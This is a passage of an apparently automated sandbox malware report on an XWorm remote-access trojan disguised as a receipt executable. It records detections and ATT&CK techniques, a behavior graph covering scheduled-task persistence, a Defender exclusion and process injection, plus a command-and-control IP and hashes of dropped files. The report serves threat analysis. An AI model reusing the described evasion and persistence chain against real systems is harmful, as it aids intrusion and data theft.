            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeQueries volume information: C:\Users\user\Desktop\Recaipt202431029.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeQueries volume information: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeQueries volume information: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\JvkAPBBIe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\Recaipt202431029.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Users\user\Desktop\Recaipt202431029.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: 0.2.Recaipt202431029.exe.3630650.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Recaipt202431029.exe.3652e70.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.JvkAPBBIe.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Recaipt202431029.exe.3652e70.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Recaipt202431029.exe.3630650.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000E.00000002.2207362277.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2126732954.00000000035C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.2181051292.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2123977991.0000000002581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4558767346.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Recaipt202431029.exe PID: 5548, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Recaipt202431029.exe PID: 612, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: JvkAPBBIe.exe PID: 1532, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: JvkAPBBIe.exe PID: 1560, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: 0.2.Recaipt202431029.exe.3630650.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Recaipt202431029.exe.3652e70.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.JvkAPBBIe.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Recaipt202431029.exe.3652e70.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Recaipt202431029.exe.3630650.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000E.00000002.2207362277.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2126732954.00000000035C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.2181051292.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2123977991.0000000002581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4558767346.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Recaipt202431029.exe PID: 5548, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Recaipt202431029.exe PID: 612, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: JvkAPBBIe.exe PID: 1532, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: JvkAPBBIe.exe PID: 1560, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Windows Management Instrumentation            		1
            Scheduled Task/Job            		111
            Process Injection            		11
            Masquerading            		1
            Input Capture            		211
            Security Software Discovery            		Remote Services1
            Input Capture            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Scheduled Task/Job            		2
            Registry Run Keys / Startup Folder            		1
            Scheduled Task/Job            		11
            Disable or Modify Tools            		LSASS Memory1
            Process Discovery            		Remote Desktop Protocol11
            Archive Collected Data            		1
            Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAt1
            DLL Side-Loading            		2
            Registry Run Keys / Startup Folder            		131
            Virtualization/Sandbox Evasion            		Security Account Manager131
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Clipboard Data            		SteganographyAutomated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading            		111
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
            Obfuscated Files or Information            		Cached Domain Credentials13
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
            Software Packing            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Timestomp            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1580358 Sample: Recaipt202431029.exe Startdate: 24/12/2024 Architecture: WINDOWS Score: 100 52 Suricata IDS alerts for network traffic 2->52 54 Found malware configuration 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 17 other signatures 2->58 7 Recaipt202431029.exe 7 2->7         started        11 JvkAPBBIe.exe 5 2->11         started        process3 file4 38 C:\Users\user\AppData\Roaming\JvkAPBBIe.exe, PE32 7->38 dropped 40 C:\Users\...\JvkAPBBIe.exe:Zone.Identifier, ASCII 7->40 dropped 42 C:\Users\user\AppData\Local\...\tmp912F.tmp, XML 7->42 dropped 44 C:\Users\user\...\Recaipt202431029.exe.log, ASCII 7->44 dropped 60 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 7->60 62 Uses schtasks.exe or at.exe to add and modify task schedules 7->62 64 Adds a directory exclusion to Windows Defender 7->64 66 Injects a PE file into a foreign processes 7->66 13 Recaipt202431029.exe 6 7->13         started        17 powershell.exe 23 7->17         started        20 powershell.exe 23 7->20         started        22 schtasks.exe 1 7->22         started        68 Antivirus detection for dropped file 11->68 70 Multi AV Scanner detection for dropped file 11->70 72 Machine Learning detection for dropped file 11->72 24 schtasks.exe 11->24         started        26 JvkAPBBIe.exe 11->26         started        signatures5 process6 dnsIp7 48 172.245.244.69, 49710, 5200 AS-COLOCROSSINGUS United States 13->48 46 C:\Users\user\AppData\Roaming46otepab .exe, PE32 13->46 dropped 50 Loading BitLocker PowerShell Module 17->50 28 conhost.exe 17->28         started        30 WmiPrvSE.exe 17->30         started        32 conhost.exe 20->32         started        34 conhost.exe 22->34         started        36 conhost.exe 24->36         started        file8 signatures9 process10

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Recaipt202431029.exe68%ReversingLabsByteCode-MSIL.Trojan.Taskun
            Recaipt202431029.exe100%AviraHEUR/AGEN.1306877
            Recaipt202431029.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\JvkAPBBIe.exe100%AviraHEUR/AGEN.1306877
            C:\Users\user\AppData\Roaming\Notepab .exe100%AviraHEUR/AGEN.1306877
            C:\Users\user\AppData\Roaming\JvkAPBBIe.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\Notepab .exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\JvkAPBBIe.exe68%ReversingLabsByteCode-MSIL.Trojan.Taskun
            C:\Users\user\AppData\Roaming\Notepab .exe68%ReversingLabsByteCode-MSIL.Trojan.Taskun

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            172.245.244.690%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            No contacted domains info

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            172.245.244.69true
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRecaipt202431029.exe, 00000000.00000002.2123977991.0000000002581000.00000004.00000800.00020000.00000000.sdmp, Recaipt202431029.exe, 00000009.00000002.4558767346.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, JvkAPBBIe.exe, 0000000A.00000002.2181051292.0000000003102000.00000004.00000800.00020000.00000000.sdmpfalse
              		high

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              172.245.244.69
              		unknownUnited States
              		36352AS-COLOCROSSINGUStrue

              General Information

              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1580358
              Start date and time:2024-12-24 11:26:06 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 9m 47s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:17
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:Recaipt202431029.exe
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winEXE@19/18@0/1
              EGA Information:
              • Successful, ratio: 75%
              HCA Information:
              • Successful, ratio: 98%
              • Number of executed functions: 407
              • Number of non-executed functions: 17
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Override analysis time to 240000 for current running targets taking high CPU consumption

              Warnings

              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 23.218.208.109, 13.107.246.63, 20.12.23.50
              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target JvkAPBBIe.exe, PID 1560 because it is empty
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
              • Report size getting too big, too many NtCreateKey calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • VT rate limit hit for: Recaipt202431029.exe

              Simulations

              Behavior and APIs

              TimeTypeDescription
              05:27:02API Interceptor8950098x Sleep call for process: Recaipt202431029.exe modified
              05:27:05API Interceptor38x Sleep call for process: powershell.exe modified
              05:27:08API Interceptor1x Sleep call for process: JvkAPBBIe.exe modified
              11:27:05Task SchedulerRun new task: JvkAPBBIe path: C:\Users\user\AppData\Roaming\JvkAPBBIe.exe
              11:27:12AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notepab .lnk

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              AS-COLOCROSSINGUSpowerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
              • 23.249.167.71
              file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, XWormBrowse
              • 104.168.28.10
              dbus.elfGet hashmaliciousUnknownBrowse
              • 107.172.88.151
              cB1ItKbbhY.msiGet hashmaliciousUnknownBrowse
              • 23.94.207.151
              tTdMHr6SlJ.dllGet hashmaliciousUnknownBrowse
              • 23.94.207.151
              e5mIhMkcj5.exeGet hashmaliciousUnknownBrowse
              • 23.94.207.151
              PVKDyWHOaX.exeGet hashmaliciousUnknownBrowse
              • 23.94.207.151
              RcFBMph6zu.exeGet hashmaliciousUnknownBrowse
              • 23.94.207.151
              tTdMHr6SlJ.dllGet hashmaliciousUnknownBrowse
              • 23.94.207.151
              e5mIhMkcj5.exeGet hashmaliciousUnknownBrowse
              • 23.94.207.151

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\JvkAPBBIe.exe.log

              Download File
              Process:C:\Users\user\AppData\Roaming\JvkAPBBIe.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1396
              Entropy (8bit):5.337066511654157
              Encrypted:false
              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhgLE4qXKIE4oKNzKoZAE4Kze0E4qE4x84j:MIHK5HKH1qHiYHKh3ogLHitHo6hAHKze
              MD5:55A2AF8F9FCA3AE99FBA235D3E16A53F
              SHA1:32F34219599006657BFF0B868257916A0C393AAA
              SHA-256:2E0B5859D8501D26669B982BD18005B625352435DB8E1D8B944EED350C1DB0B3
              SHA-512:F6EB6E6AA729963FF23349B6DF3B558896C7B294BF15F6601C4FEF2B1034DEBE207CE04A85F14124CBC41B168157778A23BAA06FCCFE13B0EE262CF2D80FDDA6
              Malicious:false
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c5619

              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Recaipt202431029.exe.log

              Download File
              Process:C:\Users\user\Desktop\Recaipt202431029.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1396
              Entropy (8bit):5.337066511654157
              Encrypted:false
              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhgLE4qXKIE4oKNzKoZAE4Kze0E4qE4x84j:MIHK5HKH1qHiYHKh3ogLHitHo6hAHKze
              MD5:55A2AF8F9FCA3AE99FBA235D3E16A53F
              SHA1:32F34219599006657BFF0B868257916A0C393AAA
              SHA-256:2E0B5859D8501D26669B982BD18005B625352435DB8E1D8B944EED350C1DB0B3
              SHA-512:F6EB6E6AA729963FF23349B6DF3B558896C7B294BF15F6601C4FEF2B1034DEBE207CE04A85F14124CBC41B168157778A23BAA06FCCFE13B0EE262CF2D80FDDA6
              Malicious:true
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c5619

              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Download File
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:dropped
              Size (bytes):2232
              Entropy (8bit):5.380805901110357
              Encrypted:false
              SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:lGLHyIFKL3IZ2KRH9Oug8s
              MD5:16AD599332DD2FF94DA0787D71688B62
              SHA1:02F738694B02E84FFE3BAB7DE5709001823C6E40
              SHA-256:452876FE504FC0DBEDBD7F8467E94F6E80002DB4572D02C723ABC69F8DF0B367
              SHA-512:A96158FDFFA424A4AC01220EDC789F3236C03AAA6A7C1A3D8BE62074B4923957E6CFEEB6E8852F9064093E0A290B0E56E4B5504D18113A7983F48D5388CEC747
              Malicious:false
              Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

              C:\Users\user\AppData\Local\Temp\Log.tmp

              Download File
              Process:C:\Users\user\Desktop\Recaipt202431029.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):29
              Entropy (8bit):3.598349098128234
              Encrypted:false
              SSDEEP:3:rRSFYJKXzovNsra:EFYJKDoWra
              MD5:2C11513C4FAB02AEDEE23EC05A2EB3CC
              SHA1:59177C177B2546FBD8EC7688BAD19D08D32640DE
              SHA-256:BCF3676333E528171EEE1055302F3863A0C89D9FFE7017EA31CF264E13C8A699
              SHA-512:08196AFA62650F1808704DCAD9918DA11175CD8792878F63E35F517B4D6CF407AC9E281D9B71A76E4CC1486CAD7079C56B74ECBEDB0A0F0DD4170FB0D30D2BAD
              Malicious:false
              Preview:....### explorer ###..[WIN]r

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d2k3mjta.cry.ps1

              Download File
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gno2miu5.2eu.psm1

              Download File
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mxpdo0qo.tmr.psm1

              Download File
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
